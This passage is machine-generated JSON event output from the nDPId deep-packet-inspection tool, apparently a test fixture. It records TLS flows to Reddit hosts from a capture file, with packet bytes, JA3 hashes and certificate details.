+00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1605291686084,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686084,"pkt":"qtsDr8lk5EKm5WPyht1gBTHMACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3Q4Bu5RtgHMAAAAAoAL9IHHJAAACBAWgBAIICql05hgAAAAAAQMDBw=="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686084,"flow_last_seen":1605291686084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1605291686084,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686084,"pkt":"qtsDr8lk5EKm5WPyht1gCcfOACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RABu9uJgbEAAAAAoAL9ICltAAACBAWgBAIICql05hgAAAAAAQMDBw=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1605291686099,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686099,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdAmJL0EwGjpsfoBJXgFyoAAACBAV4AQMDAwQCCArC1zjFqXTmAA=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1605291686099,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686099,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdABmbR4V8rX10oBJXgNWtAAACBAV4AQMDAwQCCArC1zjFqXTmAA=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1605291686099,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686099,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc\/oyw49PvcdTXoBJXgPwjAAACBAV4AQMDAwQCCArC1zjFqXTmAA=="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gBLbYACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QIBuwaOmx9iS9BNgBAB++CSAAABAQgKqXTmJ8LXOMU="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gDoxGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QABu3ytfXQZm0eGgBAB+1mYAAABAQgKqXTmJ8LXOMU="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1605291686099,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686099,"pkt":"qtsDr8lk5EKm5WPyht1gBKPwACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3P4Bu+9x1NeMsOPUgBAB+4AOAAABAQgKqXTmJ8LXOMU="} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686099,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686099,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdBugO8IeJd6tioBJXgCN0AAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdBGVsk6UAYN+NoBJXgFfrAAACBAV4AQMDAwQCCArC1zjGqXTmAA=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdCGPwRcUBxWYioBJXgB9GAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gBAJCACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QYBu4l3q2LoDvCIgBAB+6dhAAABAQgKqXTmKMLXOMY="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gCVnRACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QQBuwBg341lbJOmgBAB+9vUAAABAQgKqXTmKMLXOMY="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gAj4aACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QgBuwHFZiJj8EXGgBAB+6MzAAABAQgKqXTmKMLXOMY="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686100,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdCnzgy8YZci18oBJXgKFLAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686100,"pkt":"qtsDr8lk5EKm5WPyht1gCQMdACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QoBuxlyLXx84MvHgBAB+yU5AAABAQgKqXTmKMLXOMY="} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686060,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686100,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686101,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686101,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1605291686102,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686102,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdDA6Vo\/hs46MGoBJXgG5nAAACBAV4AQMDAwQCCArC1zjGqXTmBA=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1605291686102,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686102,"pkt":"qtsDr8lk5EKm5WPyht1gBZ0wACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QwBu2zjowYOlaP5gBAB+\/JSAAABAQgKqXTmKsLXOMY="} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686064,"flow_last_seen":1605291686103,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686103,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686035,"flow_last_seen":1605291686105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686105,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":475,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686106,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686106,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":490,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686110,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686110,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01281{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686035,"flow_last_seen":1605291686110,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686110,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":498,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686127,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686127,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":501,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686035,"flow_last_seen":1605291686128,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686128,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San 